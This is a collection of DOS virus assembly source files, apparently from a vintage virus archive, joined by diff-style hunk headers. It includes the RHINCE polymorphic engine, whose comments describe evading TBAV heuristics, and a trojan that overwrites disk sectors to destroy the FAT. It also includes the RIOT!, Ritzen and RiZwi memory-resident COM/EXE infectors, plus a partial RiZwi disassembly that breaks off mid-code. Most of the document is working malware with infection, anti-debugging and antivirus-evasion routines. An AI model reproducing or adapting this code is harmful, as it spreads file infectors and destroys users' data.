; bit 3 get random choice. next byte is the number of choices,
; followed by the choices themselves.
; bit 2 next byte is a mask indicating which bits to randomise.
; bit 1 next byte is a mask for ANDing, the byte thereafter
; is an illegal choice for the masked byte.
; bit 0 next byte is a byte displacement used to jump to.
; (for table optimisation)
;
; The commandbyte is followed by the arguments for the bit 4 command if it
; was set, then the arguments for bit 3 if it was set, et cetera. It's all
; in the code.
;
; So the original rewrite was finished but the engine's performance was still
; approximately zero. Tweaking done:
;
; ** DAA DAS AAA AAS opcodes removed. flagged by TBAV (@)
; ** $+2 flowcontrol removed. flagged by TBAV (G)
; JO/JNO branching flagged by TBAV (@)
; ** Forced first opcode to not be an flagged by TBAV (G)
; opcode needing previous register
; contents
; ** No longer builds decryptor inside flagged by TBAV (#)
; code, but rather on the heap.
;
; RHINCE v2.0 is almost TBAV heuristics proof. A negligible amount of
; samples still gets G flags on pointer references in the first 32 bytes.
; Then there is the occasional E, U, t or D flag probably caused
; by Thunderbyte interpreting the random byte and word values as code,
; i.e. signature scanning.
;
; Thunderbyte's heuristics are really interesting. The G flag for operations
; with uninitialised registers can only be triggered by the first 32 bytes
; of code (or so). The $+2 flowcontrol check is active throughout the
; program but the check for self-modifying code (which is how it detected
; v1.0) is only active in the first 512 bytes.
;
; Call Parameters: CX length of code to encrypt
; DS:DX pointer to code to encrypt
; BP offset code will be run at.
; Return Parameters: CX length of decryptor+encrypted code.
; DS:DX pointer to decryptor.
;
; Caution:Engine assumes CS=DS=ES. Also as said above, RHINCE v2.0 builds
; a decryptor on the heap. Please ensure that the heapspace is there!
; In COM infection mind the maximum filelength you can infect. In
; EXE infection you should check, and alter if necessary, the
; MINALLOC header field. If alteration of MINALLOC was necessary,
; see if MAXALLOC>MINALLOC. If not set MAXALLOC==MINALLOC.
;
; RHINCE v2.0: 377 bytes undiluted polymorphic generation code.
; - Rhince.
.model tiny
.code
org 100h
;Below is a small demogenerator. Assemble & run this file as is to generate
;an encrypted HELLO.COM file, cut/paste the engine code otherwise.
start:
mov ah,3ch
xor cx,cx
mov dx, offset file
int 21h
push ax
mov dx, offset prog
mov cx, (endprog-prog)
mov bp, 100h
call mut_eng
pop bx
mov ah, 40h
int 21h
mov ah, 3eh
int 21h
mov ah,9
mov dx, offset msg
int 21h
int 20h
file db 'hello.com',0
msg db 'Run HELLO.COM to decrypt and print a sacred VLAD scripture$'
prog: mov ah,9
call $+3
delta: pop dx
add dx, (str-delta)
int 21h
int 20h
str db 'At the word of the dark judges, that word which '
db 'tortures the spirit,',0dh,0ah
db 'Kantza-Merada, even the goddess, was turned to a '
db 'dead body,',0dh,0ah
db 'Defiled, polluted, a corpse hangin'' from a stake.'
db 0dh,0ah,0dh,0ah
db 'Most strangely, Kantza-Merada, are the laws of the '
db 'dark world effected.',0dh,0ah
db 'O Kantza-Merada, do not question the laws of the '
db 'nether world.',0dh,0ah,0dh,0ah
db 'The goddess from the great above descended to the '
db 'great below.',0dh,0ah
db 'To the nether world of darkness she descended.',0dh,0ah
db 'The goddess abandoned heaven, abandoned earth,',0dh,0ah
db 'Abandoned dominion, abandoned ladyship,',0dh,0ah
db 'To the nether world of darkness she descended.$'
endprog:
;------ Engine starts here.
mut_eng: mov di, offset resulting_code
inc cx
shr cx,1
mov word ptr [di-(resulting_code-cntr)],cx
call get_rand
mov ah,al
call get_rand
mov word ptr [di-(resulting_code-seed)],ax
push bp
push dx
call get_rand
and ax, 1
call do_garbage_manual
mov cx, 9
genloop: push cx
call get_rand
and ax,0fh
inc ax
xchg ax,cx
gloop: push cx
call do_garbage
pop cx
loop gloop
mov ax, 0c72eh
stosw
mov al, 06
stosb
pop cx
mov bx,cx
add bx,bx
mov word ptr ds:[workspace-2+bx],di
stosw
stosw
loop genloop
pop si
pop bp
mov al, 0e9h
stosb
mov cx, word ptr cntr
mov ax,cx
add ax,cx
stosw
add ax, (endframe-framework)
neg ax
mov jmpback, ax
lea bx, [di+bp+(-(offset resulting_code))]
mov word ptr ptr, bx
cryptloop:
lodsw
xor ax, word ptr seed
stosw
loop cryptloop
mov dx,di
push di
mov si, offset framework
mov bx, offset resulting_code
push bx
sub bp,bx
mov cx,9
fill_loop: dec bx
dec bx
mov di, word ptr [bx]
lea ax, [bp+si+(-(offset framework))]
add ax,dx
stosw
movsw
loop fill_loop
pop dx
pop cx
sub cx,dx
ret
get_rand: in al,40h
rol al,1 ;RNG v2.0
xor al, 0ffh
org $-1
Randomize db ?
mov randomize,al
ret
do_garbage: call get_rand
and ax, 0fh
do_garbage_manual:
mov bx,ax
mov bl, byte ptr [calltable+bx]
xor bh,bh
lea bp, [bx+poly]
interpret_string:
mov si,bp
cwd
lodsb
mov dh,al
test dh,16
jz dont_quote
lodsb
mov dl,al
dont_quote: test dh,8
jz dont_select
lodsb
cbw
xchg ax,cx
call get_rand
xor ah,ah
div cl
xchg al,ah
cbw
xchg ax,bx
mov dl, byte ptr ds:[si+bx]
add si,cx
dont_select: test dh,4
jz no_random_masking
call get_rand
and al, byte ptr ds:[si]
or dl,al
inc si
no_random_masking:
test dh,2
jz no_illegal
lodsb
and al,dl
inc si
cmp al, byte ptr ds:[si-1]
jz interpret_string
no_illegal: mov bp,si
mov al,dl
stosb
test dh,1
jz no_jmp
lodsb
cbw
add bp,ax
no_jmp: cmp byte ptr ds:[bp],0
jnz interpret_string
ret
calltable: db rnd_mov_8 - poly
db rnd_mov_16 - poly
db onebyte - poly
db incs - poly
db incs - poly
db arithmetic_8 - poly
db arithmetic_16 - poly
db big_class_0_40 - poly
db onebyte - poly
db big_class_40_80 - poly
db big_class_80_c0 - poly
db big_class_c0_100 - poly
db rnd_mov_8 - poly
db rnd_mov_16 - poly
db rnd_mov_8 - poly
db rnd_mov_16 - poly
endcalltable:
poly:
big_class_0_40: db 00010100b,00000010b,00111001b,00000110b,00011111b
db 00000111b,6,00
big_class_40_80:db 00010100b,00100010b,00011001b,00010111b,01000000b
db 00011111b,00000111b,6,rndbyte-$
big_class_80_c0:db 00010100b,00100010b,00011001b,00010111b,10000000b
db 00011111b,00000111b,6,rndword-$
big_class_c0_100:
db 00010100b,00100010b,00011001b,00010110b,11000000b
db 00011111b,00000111b,6,00
flow_control: db 00010100b,72h,7,00010000b,0,0
arithmetic_8: db 00010101b,00000100b,00111000b,rndbyte-$
arithmetic_16: db 00010101b,00000101b,00111000b,rndword-$
rnd_mov_8: db 00010101b,0b0h,7,rndbyte-$
rnd_mov_16: db 00010110b,0b8h,07,07,04
rndword: db 00000100b,0ffh
rndbyte: db 00000100b,0ffh,0
incs: db 00010110b,40h,0fh,7,4,0
onebyte: db 00001000b,(end_onebyters-onebyters)
onebyters: db 0fdh,0fch,0fbh,0f9h,0f8h,0f5h,0d7h,9fh,9eh,99h,98h
db 91h,92h,93h,95h,96h,97h
end_onebyters: db 0
framework: cld
mov si, 1234h
ptr equ $-2
mov cx, 1234h
cntr equ $-2
frameloop: xor word ptr cs:[si], 1234h
seed equ $-2
lodsw
loop frameloop
db 0e9h
jmpback dw ?
endframe:
workspace db endframe-framework dup (?)
resulting_code:
end start
@@ -0,0 +1,83 @@
; RICHARDS.ASM -- R. Simmons Trojan
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 3 ; Trojan Horse
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
mov bx,offset null_vector ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov si,offset data00 ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
mov ax,0002h ; First argument is 2
mov cx,0010h ; Second argument is 16
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
int 026h ; DOS absolute write interrupt
sti ; Restore interrupts
mov ax,04C00h ; DOS terminate function
int 021h
main endp
data00 db "C'mon now, trim that FAT! 1 and 2 and 3 and....",13,10,10,0
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "The Richard Simmons Trojan; gu"
db "aranteed to get rid of that un"
db "sightly FAT in no time!",0
db "[Richard Simmons Trojan]",0
db "Nowhere Man, [NuKE] '92",0
end_of_code label near
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: xor word ptr [si],06734h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
@@ -0,0 +1,186 @@
From netcom.com!ix.netcom.com!netnews Sat Nov 12 17:11:15 1994
Xref: netcom.com alt.comp.virus:200
Path: netcom.com!ix.netcom.com!netnews
From: Zeppelin@ix.netcom.com (Mr. G)
Newsgroups: alt.comp.virus
Subject: Re:Riot
Date: 12 Nov 1994 03:37:30 GMT
Organization: Netcom
Lines: 171
Distribution: world
Message-ID: <3a1d9q$ma6@ixnews1.ix.netcom.com>
References: <3a0s7b$r6i$1@mhadf.production.compuserve.com> <3a1aj7$l5e@ixnews1.ix.netcom.com> <3a1cri$m31@ixnews1.ix.netcom.com>
NNTP-Posting-Host: ix-ir4-21.ix.netcom.com
; RIOT! - Revolution In Our Time
model tiny
code
org 100h
start:
; push ax ; Original push "ax",
PUSH DX ; But push dx instead,
; and S&S FindViru can't
; find it as NINA-256 :)
mov ax,9753h ; installation check
int 21h
mov ax,ds
dec ax
mov ds,ax ; ds->program MCB
mov ax,ds:[3] ; get size word
push bx
push es
sub ax,40h ; reserve 40h paragraphs
mov bx,ax
mov ah,4Ah ; Shrink memory
allocation
int 21h
mov ah,48h ; Allocate 3Fh
paragraphs
mov bx,3Fh ; for the virus
int 21h
mov es,ax ; copy virus to high
xor di,di ; memory
mov si,offset start + 10h ; start at MCB:110h
mov cx,100h ; (same as PSP:100h)
rep movsb
sub ax,10h ; adjust offset as if it
push ax ; originated at 100h
mov ax,offset highentry
push ax
retf
highentry:
mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so
the
; memory isn't freed
when the
; program terminates
mov ax,3521h ; get int 21h vector
int 21h
mov word ptr cs:oldint21,bx ; save it
mov word ptr cs:oldint21+2,es
push es
pop ds
mov dx,bx
mov ax,2591h ; redirect int 91h to
int 21h
int 21h
push cs
pop ds
mov dx,offset int21
mov al,21h ; set int 21h to virus
vector
int 21h
pop ds ; ds->original program
PSP
pop bx
push ds
pop es
ENDFILE dw 100h ; Size of infected COM
file
return_COM:
mov di,100h ; restore original
mov si,endfile ; file
add si,di ; adjust for COM
starting
mov cx,100h ; offset
rep movsb
pop ax
push ds ; jmp back to original
mov bp,100h ; file (PSP:100)
push bp
retf
exit_install:
pop ax ; pop CS:IP and flags in
pop ax ; order to balance the
pop ax ; stack and then exit
the
jmp short return_COM ; infected COM file
int21:
cmp ax,9753h ; installation check?
je exit_install
cmp ax,4B00h ; execute?
jne exitint21 ; nope, quit
push ax ; save registers
push bx
push cx
push dx
push ds
call infect
pop ds ; restore registers
pop dx
pop cx
pop bx
pop ax
exitint21:
db 0eah ; jmp far ptr
oldint21 dd ?
infect:
mov ax,3D02h ; open file read/write
int 91h
jc exit_infect
mov bx,ax
mov cx,100h
push cs
pop ds
mov ah,3Fh ; Read first 100h bytes
mov dx,offset endvirus
int 91h
mov ax,word ptr endvirus
cmp ax,'MZ' ; exit if EXE
je close_exit_infect
cmp ax,'ZM' ; exit if EXE
je close_exit_infect
cmp word ptr endvirus+2,9753h ; exit if already
je close_exit_infect ; infected
mov al,2 ; go to end of file
call move_file_pointer
cmp ax,0FEB0h ; exit if too large
ja close_exit_infect
cmp ax,1F4h ; or too small for
jb close_exit_infect ; infection
mov endfile,ax ; save file size
call write
mov al,0 ; go to start of file
call move_file_pointer
mov dx,100h ; write virus
call write
close_exit_infect:
mov ah,3Eh ; Close file
int 91h
exit_infect:
retn
move_file_pointer:
push dx
xor cx,cx
xor dx,dx
mov ah,42h
int 91h
pop dx
retn
write:
mov ah,40h
mov cx,100h
int 91h
retn
db ' RIOT!' ; Revolution In Our Time!
endvirus:
int 20h ; original COM file
end start
@@ -0,0 +1,495 @@
;*****************************************************************************
;* *
;* The Ritzen Virus *
;* *
;* (c) '93, by S.A.R. (Students Agains Ritzen) / TridenT *
;* *
;*****************************************************************************
.model tiny
.radix 16
.code
len equ offset last - atlantic
len_para equ len /10h
mem_size equ 60h
org 100h
dummy: db 0e9h,00h,00h ; dummy file,
; contains jump to
; virus code.
atlantic: call get_ip
sub bp,offset atlantic+3
rest_host: push ds
pop ax
mov cs:[segm+bp],ax
cmp cs:[type_host+bp],'E' ; check if host
je fix_exe ; is COM or EXE.
fix_com: lea si,cs:[com_start+bp] ; fix start of
mov ax,es
inc ax
mov es,ax
mov di,00F0h ; com host with
mov cx,03h ; original data.
rep movsb
mov ax,es
dec ax
mov es,ax
mov ax,0100h ; IP start at 0100h.
push cs ; store segment+IP
push ax ; on stack.
jmp chk_resident
fix_exe: mov ax,cs:[exe_cs+bp] ; CS and IP on stack
mov bx,ax
mov ax,ds
add ax,bx
add ax,10h
push ax
mov bx,cs:[exe_ip+bp]
push bx
chk_resident: mov dx,0aaaah
mov ax,3000h
int 21h
cmp dx,0bbbbh
je end_install
mem_install: push ds ; let DS points
push ds
pop ax ; to MCB
dec ax ; 2 times to fool
dec ax ; heuristic scanners
push ax
pop ds
cmp byte ptr ds:[0010],5ah ; last MCB?
jne abort_install ; if no, quit.
mov ax,ds:[0013] ; adjust memory
sub ax,mem_size ; size.
mov ds:[0013],ax ; store size in MCB.
pop ds ; restore original
; DS segment.
sub word ptr ds:[0002],mem_size ; don't forget to
; adjust memory
; size stored in
; PSP to.
vir_install: xchg ax,bx ; install virus
mov ax,es
add ax,bx ; AX = virussegment
mov es,ax
mov cs:[vir_seg+bp],ax
push cs
pop ds
lea si,[atlantic+bp] ; copy virus to
lea di,es:0103h ; memory
mov cx,len
copy: movsb
dec cx
jnz copy
push ds
pop es
hook_i21h: cli
mov ax,3521h
int 21h
mov ds,cs:[vir_seg+bp]
mov [i21h],bx
mov [i21h+2],es
; mov dx, offset ds:[mine_i21h]
; mov ax,2521h
; int 21h
mov ax,ds
mov bx,ax
mov dx, offset ds:[mine_i21h]
xor ax,ax
mov ds,ax
mov ds:[4*21h],dx
mov ds:[4*21h+2],bx
sti
abort_install: mov ax,cs:[segm+bp]
push ax
pop es
push es
pop ds
end_install: retf
;*************************************************************************
;* *
;* I N T E R U P T H A N D L E R *
;* *
;*************************************************************************
mine_i24h: mov al,03h
iret
mine_i21h: pushf ; check for
cmp ax,3000h ; virus ID
jne new_21h
cmp dx,0aaaah
jne new_21h
mov dx,0bbbbh ; return ID
popf
iret
new_21h: push ax ; save registers
push bx
push cx
push dx
push ds
push es
push di
push si
chk_open: xchg ax,bx
cmp bh,3dh ; open file?
je chk_com
chk_exec: cmp bx,04b00h ; execute file?
je chk_com
continu: pop si ; restore registers
pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
next: popf ; call original
jmp dword ptr cs:[i21h] ; interupt
;**************************************************************************
;* *
;* C H E C K C O M / E X E F I L E *
;* *
;**************************************************************************
chk_com: mov cs:[name_seg],ds
mov cs:[name_off],dx
cld
mov cx,0ffh
push ds
pop es
push dx
pop di
mov al,'.'
repne scasb
cmp word ptr es:[di],'OC'
jne chk_exe
cmp word ptr es:[di+2],'M'
jne continu
jmp infect_com
chk_exe: cmp word ptr es:[di],'XE'
jne continu
cmp word ptr es:[di+2],'E'
jne continu
jmp infect_exe
;**************************************************************************
;* *
;* I N F E C T C O M - F I L E *
;* *
;**************************************************************************
infect_com: call init
cmp cs:[fout],0ffh
je close_file
mov cs:[type_host],'C'
mov ax,4200h ; go to start of file
call mov_point
mov cx,03h
mov ah,3fh
lea dx,cs:[com_start]
call do_int21h
mov ax,4200h
call mov_point
mov ax,4202h
call mov_point
sub ax,03h
mov cs:[lenght_file],ax
call write_jmp
call write_vir
call save_date
close_file: mov bx,cs:[handle]
mov ah,3eh
call do_int21h
restore_int24h: mov dx,cs:[i24h]
mov ds,cs:[i24h+2]
mov ax,2524h
call do_int21h
jmp continu
;**************************************************************************
;* *
;* I N F E C T E X E - F I L E *
;* *
;**************************************************************************
infect_exe: call init
cmp cs:[fout],0ffh
je close_file
mov cs:[type_host],'E'
mov ax,4200h
call mov_point
mov ah,3fh
mov cx,18h
lea dx,[head_exe]
call do_int21h
call inf_exe
call save_date
jmp close_file
;**************************************************************************
;* *
;* R O U T I N E S *
;* *
;**************************************************************************
get_ip: push sp ; get ip from stack
pop bx
mov ax, word ptr cs:[bx]
mov bp,ax
ret
init: mov cs:[fout],00h
call int24h
call open_file
jc error
call set_atributes
call get_date
call chk_infect
je error
ret
error: mov cs:[fout],0ffh
ret
int24h: push cs
pop ds
mov ax,3524h
call do_int21h
mov cs:[i24h],bx
mov cs:[i24h+2],es
mov dx, offset mine_i24h
mov ax,2524h
call do_int21h
ret
mov_point: push cs
pop ds
mov bx,cs:[handle]
xor cx,cx
xor dx,dx
call do_int21h
ret
open_file: mov ds,cs:[name_seg]
mov dx,cs:[name_off]
mov ax,3d02h
call do_int21h
mov cs:[handle],ax
mov bx,ax
ret
set_atributes: mov ax,4200h
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
call do_int21h
and cl,0feh
mov ax,4301h
call do_int21h
ret
get_date: mov bx,cs:[handle]
mov ax,5700h
call do_int21h
mov cs:[date],dx
mov cs:[time],cx
ret
chk_infect: push cs
pop ds
mov ax,4202h
xor cx,cx
sub cx,01h
xor dx,dx
sub dx,02h
mov bx,cs:[handle]
call do_int21h
mov ah,3fh
mov cx,02h
lea dx,cs:[file_id]
call do_int21h
mov al, byte ptr cs:[file_id]
mov ah, byte ptr cs:[file_id]+1
cmp ax,[virus_id]
ret
write_jmp: push cs
pop ds
mov ax,4200h
call mov_point
mov ah,40h
mov cx,01h
lea dx,cs:[jump]
call do_int21h
mov ah,40h
mov cx,02h
lea dx,cs:[lenght_file]
call do_int21h
ret
write_vir: push cs
pop ds
mov ax,4202h
call mov_point
mov ah,40h
mov cx,len
mov dx,103h
call do_int21h
ret
save_date: mov ax,5700h
call do_int21h
mov cs:[date],dx
mov cs:[time],cx
ret
inf_exe: mov ax,word ptr cs:[head_exe+14h]
mov cs:[exe_ip],ax
mov ax, word ptr cs:[head_exe+16h]
mov cs:[exe_cs],ax
mov ax,4200h
call mov_point
mov ax,4202h
call mov_point
mov bx,10h
div bx
sub ax, word ptr cs:[head_exe+08h]
mov cs:[new_cs],ax
mov cs:[new_ip],dx
call write_vir
mov ax,4200h
call mov_point
mov ax,4202h
call mov_point
mov bx,0200h
div bx
cmp dx,0000h
jne not_zero
jmp zero
not_zero: inc ax
zero: mov word ptr cs:[head_exe+02h],dx
mov word ptr cs:[head_exe+04h],ax
mov ax,cs:[new_ip]
mov word ptr cs:[head_exe+14h],ax
mov ax,cs:[new_cs]
mov word ptr cs:[head_exe+16h],ax
mov word ptr cs:[head_exe+0Eh],ax
add word ptr cs:[head_exe+10],len_para
; mov word ptr cs:[head_exe+10],1000
mov ax,4200h
call mov_point
mov ah,40h
mov bx,cs:[handle]
mov cx,18h
lea dx,cs:[head_exe]
call do_int21h
ret
do_int21h: pushf
call dword ptr cs:[i21h]
ret
;****************************************************************************
;* *
;* D A T A *
;* *
;****************************************************************************
type_host db 'C'
com_start db 0cdh,20h,90h
message db " Dedicated to Ritzen, our Minister of Education and Science."
db " We are getting sick of your budget cuts so we hope that"
db " you get sick of this virus.."
db " (c) '93 by S.A.R. / TridenT ."
exe_cs dw ?
exe_ip dw ?
new_cs dw ?
new_ip dw ?
vir_seg dw ?
i21h dw 00h,00h
i24h dw 00h,00h
name_seg dw ?
name_off dw ?
lenght_file dw ?
head_exe db 18 dup (?)
handle dw ?
fout db ?
file_id dw ?
jump db 0e9h
date dw ?
time dw ?
segm dw ?
virus_id dw "AP"
last dw "AP"
end dummy
@@ -0,0 +1,256 @@
;
; RiZwi Virus by John Tardy / Trident V1.1
;
; This is a tom-resident .com infector, including command.com. it attaches
; itself at the eof. when the generation counter is between 200 and 240, a
; timer counter will be started. when it reached 5000 hex ticks, it will
; display a message with black chars and a red background in the upper corner.
; The message says an important fact of Righard Zwienenberg, who is known in
; The Netherlands as a anti-virus researcher. In fact, he did release a virus,
; named "DUTCH-555". I know he did it accidentally, but you should do it. You
; have to be on just one side, virus or antivirus. If you can't choose, then
; stop with computing. If you choose, I hope you choose our side. It has more
; possibilities and with your capabilities your virii could be well-known
; (look at the VSUM for your ratings). Maybe you even choose to be part of
; [NUkE] or Phalcon/Skism or even Trident.
;
; This is a bug-fix of V1.0, which kept the original interupt in the main
; program, thus simply hanging. This one has also a little debugger trap.
Org 100h
Prg: Call On1
On1: Pop Bp
Sub Bp,On1
Mov Ah,30h
Int 21h
Cmp Bx,'BC'
Je Tooz
Mov Ah,2ah
Int 21h
In Al,21h
Cmp Cx,1993
Ja MakeRes
Cmp Dh,4
Ja MakeRes
Tooz: Jmp DoCom
MakeRes: Or Al,02h
Push Ax
Mov Ax,351ch
Int 21h
Mov Word Ptr Cs:Old1c[0][Bp],Bx
Mov Word Ptr Cs:Old1c[2][Bp],es
Pop Ax
Out 21h,Al
CutIt: Mov Ax,3521h
Int 21h
Mov Word Ptr Cs:Old21[0][Bp],Bx
Mov Word Ptr Cs:Old21[2][Bp],Es
In Al,21h
And Al,2
Push Ax
Mov Ax,Cs
Dec Ax
Mov Ds,Ax
Cmp Byte Ptr Ds:[0],'Z'
Jne DoCom
Sub Word Ptr Ds:[3],PrgPar
Sub Word Ptr Ds:[12h],PrgPar
Lea Si,Prg[Bp]
Mov Di,100h
Pop Ax
Cmp Al,2
Jne CutIt
Mov Ax,Word Ptr Ds:[12h]
Sub Ax,10h
Mov Es,Ax
Mov Cx,PrgLen
Push Cs
Pop Ds
Rep Movsb
In Al,21h
Xor Al,2
Mov Ds,Es
Out 21h,Al
Mov Ax,251ch
Lea Dx,New1c
Int 21h
Mov Ax,2521h
Lea Dx,New21
Int 21h
DoCom: Push Cs
Pop Ds
Mov Es,Ds
Mov Di,100h
Push Di
Lea Si,OrgPrg[Bp]
Movsw
Movsb
Ret
OrgPrg DB 0CDh,020h
DB ''
Db '[TridenT]'
Dos: Pushf
Call Dword Ptr Cs:[Old21]
Ret
Db '{V1.1 Bugfix}'
Old21 DD 0
New21: Cmp Ax,4b00h
Je Exec
Cmp Ah,30h
Jne EOI
Call Dos
Mov Bx,'BC'
Iret
EOI: Jmp Dword Ptr Cs:[Old21]
Exec: Push Ax
Push Bx
Push Cx
Push Dx
Push Si
Push Di
Push Ds
Push Es
Push Bp
Push Ds
Push Dx
Mov Ax,4300h
Call Dos
Mov FAttr,Cx
Xor Cx,Cx
Mov Ax,4301h
Call Dos
Mov Ax,3d02h
Call Dos
Mov FHandle,Ax
Xchg Ax,Bx
Mov Ax,5700h
Call Dos
Mov Word Ptr Cs:[FTime],Cx
Mov Word Ptr Cs:[FDate],Dx
And Cx,1fh
Cmp Cx,1fh
Jne DoMore
Close: Mov Ah,3eh
Call Dos
Pop Dx
Pop Ds
Mov Cx,FAttr
Mov Ax,4301h
Call Dos
Jmp ShutDown
DoMore: Mov Ah,3fh
Push Cs
Pop Ds
Lea Dx,OrgPrg
Mov Cx,3
Call Dos
Cmp Word Ptr Cs:[OrgPrg],'MZ'
Je Close
Cmp Word Ptr Cs:[OrgPrg],'ZM'
Je Close
Mov Ax,4202h
Xor Cx,Cx
Xor Dx,Dx
Call Dos
Sub Ax,3
Mov Jump,Ax
Mov Ah,40h
Lea Dx,Prg
Mov Cx,PrgLen
Call Dos
Mov Ax,4200h
Xor Cx,Cx
Xor Dx,Dx
Call Dos
Mov Ah,40h
Lea Dx,Start
Mov Cx,3
Call Dos
Mov Ax,5701h
Mov Cx,FTime
Mov Dx,FDate
Or Cx,1fh
Call Dos
Inc Byte Ptr Cs:[FileCount]
Jmp Close
ShutDown: Pop Bp
Pop Es
Pop Ds
Pop Di
Pop Si
Pop Dx
Pop Cx
Pop Bx
Pop Ax
Jmp EOI
Old1c DD 0
New1c: pushf
push ax
push cx
push si
push di
push ds
push es
Cmp Byte Ptr Cs:[FileCount],200
Jb EOI16
Cmp Byte Ptr Cs:[FileCount],240
Ja EOI16
Cmp Word Ptr Cs:[ActCount],5000h
Je Activate
Inc Word Ptr Cs:[ActCount]
Jmp EOI16
Activate:
Mov Ds,Cs
Mov Ax,0b800h
Mov Es,Ax
Lea Si,ScrMsg
Mov Di,160
Sub Di,ScrLen
Mov Cx,ScrLen
Rep MovSb
EOI16: pop es
pop ds
pop di
pop si
pop cx
pop ax
popf
iret
ScrMsg Db ' OROiOgOhOaOrOdO OZOwOiOeOnOeOnObOeOrOgO OmOaOdOeO OtOhOeO ODOUOTOCOHO-O5O5O5O OVOiOrOuOsO!O!O!O O'
ScrLen Equ $-ScrMsg
FileCount Db 0
ActCount Dw 0
Start Db 0e9h
Jump Dw 0
FAttr Dw 0
FHandle Dw 0
FDate Dw 0
FTime Dw 0
PrgLen Equ $-Prg
PrgPar Equ (PrgLen+0fh)/16
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@@ -0,0 +1,297 @@
;Rizwi Virus from the TridenT research group.
;Memory resident .COM infector.
;This virus is only active after the spring of 1994.
;When active, it infects .COM files on execution, and keeps
;track of the number of files that it has infected. While it has
;infected between 0C8h and 0f0h files, it displays the message
;that " Righard Zwienenberg made the DUTCH-555 virus!!! " on
;the screen.
;This virus has some anti-debugging code, as it masks the keyboard
;interrupt and checks to see if it remaines masked, so when debugging
;through it one must jump over these sections of code (In/Out port 21h
;and the checking of ax accompanying them).
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
call Get_Offset
Get_Offset:
pop bp
sub bp,offset Get_Offset
mov ah,30h
int 21h ;Get Dos version/Install Check
cmp bx,4243h
je DoneInstall ;Already Installed
mov ah,2Ah
int 21h ;Get date
in al,21h ;Read interrupt masks...
cmp cx,1993 ;Is year later than 1993?
ja GoMemRes ;If not, exit.
cmp dh,4
ja GoMemRes ;Is month < May, exit.
DoneInstall:
db 0e9h,74h,0 ;jmp ReturnToHost
GoMemRes:
or al,2
push ax
mov ax,351Ch
int 21h ;Get timer interrupt
mov cs:[Int1cIP+bp],bx
mov cs:[Int1cCS+bp],es
pop ax
out 21h,al ;Interrupt - disable keyboard?
SetInterrupts:
mov ax,3521h
int 21h ;Get int 21 address
mov word ptr cs:[OldInt21+bp],bx
mov word ptr cs:[OldInt21+2+bp],es
in al,21h
and al,2
push ax
mov ax,cs
dec ax
mov ds,ax ;Set DS = MCB
cmp byte ptr ds:0,'Z' ;Are we at the end of the
jne ReturnToHost ;memory chain?
;sub word ptr ds:[3],27h ;Decrease MCB size
db 81h,2eh,03,0,27h,0
;sub word ptr ds:[12h],27h ;Decrease PSP top of memory
db 81h,2eh,12h,0,27h,0
lea si,[bp+100h] ;SI = beginning of virus
mov di,100h ;DI = new offset (100h)
pop ax
cmp al,2 ;Did someone skip interrupt
jne SetInterrupts ;disabling code? If so,
;loop them back to redo
;interrupt setting.
mov ax,ds:[12h] ;Get free segment
sub ax,10h ;Subtract 10h to account for
mov es,ax ; offset of 100h
mov cx,263h
push cs
pop ds
rep movsb ;Copy virus into memory
in al,21h
xor al,2
push es
pop ds
out 21h,al ;Do the keyboard int again...
mov ax,251Ch
mov dx,offset Int1cHandler
int 21h ;Set int 1ch
mov ax,2521h
mov dx,offset Int21Handler
int 21h ;Set int 21h
ReturnToHost:
push cs ;Restore Seg regs
pop ds
push ds
pop es
mov di,100h
push di
lea si,[bp+Storage_Bytes] ;Storage bytes
movsw
movsb ;Restore host
ret
Storage_Bytes:
int 20h
popf
TridenT_ID db '[TridenT]'
FakeInt21h:
pushf
call dword ptr cs:OldInt21 ;Fake Interrupt 21h
retn
VirusVersion db '{V1.1 Bugfix}'
OldInt21 dw 0, 0
Int21Handler:
cmp ax,4b00h
je IsExecute
cmp ah,30h
jnz ExitInt21
call FakeInt21h
mov bx,4243h
iret
ExitInt21:
jmp dword ptr cs:OldInt21
IsExecute:
